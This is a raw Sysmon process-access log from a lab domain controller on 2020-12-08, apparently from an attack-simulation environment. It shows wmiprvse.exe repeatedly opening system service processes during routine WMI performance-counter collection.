13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005113Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005112Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005111Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005110Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005109Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005108Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005107Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005106Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005105Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005104Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005103Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005102Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005101Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005100Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005099Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005098Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 